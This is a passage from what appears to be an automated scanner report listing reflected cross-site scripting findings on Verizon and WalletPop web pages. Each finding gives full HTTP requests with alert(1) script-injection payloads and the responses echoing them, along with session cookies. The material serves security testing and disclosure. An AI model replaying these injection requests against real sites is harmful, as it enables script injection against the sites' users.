Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1 HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:47:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:47:45 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1";
</script>

2.793. http://www.verizon.net/central/bookmark [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5125b"-alert(1)-"3649764250f was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:36 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

2.794. http://www.verizon.net/central/bookmark [web_search_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63d6b"-alert(1)-"fda7c8459b2 was submitted in the web_search_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:37 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr";
</script>

2.795. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.verizon.net
Path:   /ssowebapp/VOLPortalLogin

Issue detail

The value of the clientId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983ec"><script>alert(1)</script>841594c598 was submitted in the clientId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ssowebapp/VOLPortalLogin?stid=off&clientId=cnsmrshp983ec"><script>alert(1)</script>841594c598&TARGET=http%3a%2f%2fsurround.verizon.net%2fshop%2fshopRedirect.aspx%3foid%3dVX765 HTTP/1.1
Host: www.verizon.net
Connection: keep-alive
Referer: http://surround.verizon.net/Shop/featuredOffers/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; ASPSESSIONIDQATSQSBC=MEKENDBDIDAPOCCODLFOHPEE; NEWSROOMAPPID=kV3wMnpRBGZtF47vYMhnC6H01yDyknH7BDQrjhgzl9X05vXG1xV1!1633138470; lob=webmail; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210674565:ss=1290210227164; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:16:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:16:23 GMT
Connection: keep-alive
Set-Cookie: VZSSO_SESSIONID=GZFyMnvXscXgyJwMnppC9Y8Qnl9rrgznxGLLcNvxtXFP68WvTmrC!703478465; path=/
Set-Cookie: lob=consumer; domain=verizon.net; path=/
Set-Cookie: AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; domain=verizon.net; path=/
Set-Cookie: ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; domain=verizon.net; path=/
Content-Length: 29010


<!-- Instance name: sso3a -->


<html>

<head>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Sign In</titl
...[SNIP]...
<input type="hidden" name="clientId" value="cnsmrshp983ec"><script>alert(1)</script>841594c598" />
...[SNIP]...

2.796. http://www.verizonwireless.com/b2c/store/controller [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159a9"><script>alert(1)</script>cea6d5d8c05 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217532779; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

2.797. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the deviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd574"><script>alert(1)</script>6360605e49 was submitted in the deviceType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217537902; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort" />
...[SNIP]...

2.798. http://www.verizonwireless.com/b2c/store/controller [item parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the item request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf659"><script>alert(1)</script>df6912777c8 was submitted in the item parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217526081; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

2.799. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04d3"><script>alert(1)</script>cc1eed593b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:52 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217552301; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1" />
...[SNIP]...

2.800. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the sortOption request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f90f"><script>alert(1)</script>154bd675ac6 was submitted in the sortOption parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:42 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217542028; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6" />
...[SNIP]...

2.801. http://www.walletpop.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 104af"-alert(1)-"2d4c1750c26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?104af"-alert(1)-"2d4c1750c26=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:52:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=D2310A50DF474E6F4447E8D973492340; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 113644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
265.pageName=s_265.pfxID + " : " + "Personal finance news, advice, calculators";
s_265.channel="us.walletpop";
s_265.prop1="Wallet Pop";
s_265.prop2="Main";
s_265.prop12="http://www.walletpop.com/?104af"-alert(1)-"2d4c1750c26=1";
s_265.prop21="commentsPage1";

s_265.trackExternalLinks=true;
s_265.linkInternalFilters="javascript:,aol.com,walletpop.com";
s_265.linkExternalFilters="";

s_265.mmxgo=true;

var s_code=s
...[SNIP]...

2.802. http://www.walletpop.com/blog/category/consumer-ally/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.walletpop.com
Path:   /blog/category/consumer-ally/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eeda"><a>30c2294b14d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/category/consumer-ally5eeda"><a>30c2294b14d/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:53:48 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 41994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <t
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/blog/category/consumer-ally5eeda"><a>30c2294b14d/"/>
...[SNIP]...

2.803. http://www.walletpop.com/blog/category/consumer-ally/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /blog/category/consumer-ally/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b55b8"-alert(1)-"c09e862f267 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/category/consumer-allyb55b8"-alert(1)-"c09e862f267/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:54:01 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 42073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <t
...[SNIP]...
geType="";
s_265.linkInternalFilters="javascript:,walletpop.com";
s_265.mmxgo = true;
s_265.prop1="WalletPop";
s_265.prop2="Category";
s_265.prop12="http://www.walletpop.com/blog/category/consumer-allyb55b8"-alert(1)-"c09e862f267/";
s_265.prop16="Consumer Allyb55b8\\\" Alert(1) \\\"c09e862f267 -- WalletPop";
s_265.prop17="";
s_265.prop18="consumer-allyb55b8\"-alert(1)-\"c09e862f267";
s_265.prop19="";
s_265.prop20="";
s_265.pro
...[SNIP]...

2.804. http://www.walletpop.com/blog/category/consumer-ally/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /blog/category/consumer-ally/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561c9"-alert(1)-"71480e1a622 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/category/consumer-ally/?561c9"-alert(1)-"71480e1a622=1 HTTP/1.1
Host: www.walletpop.com
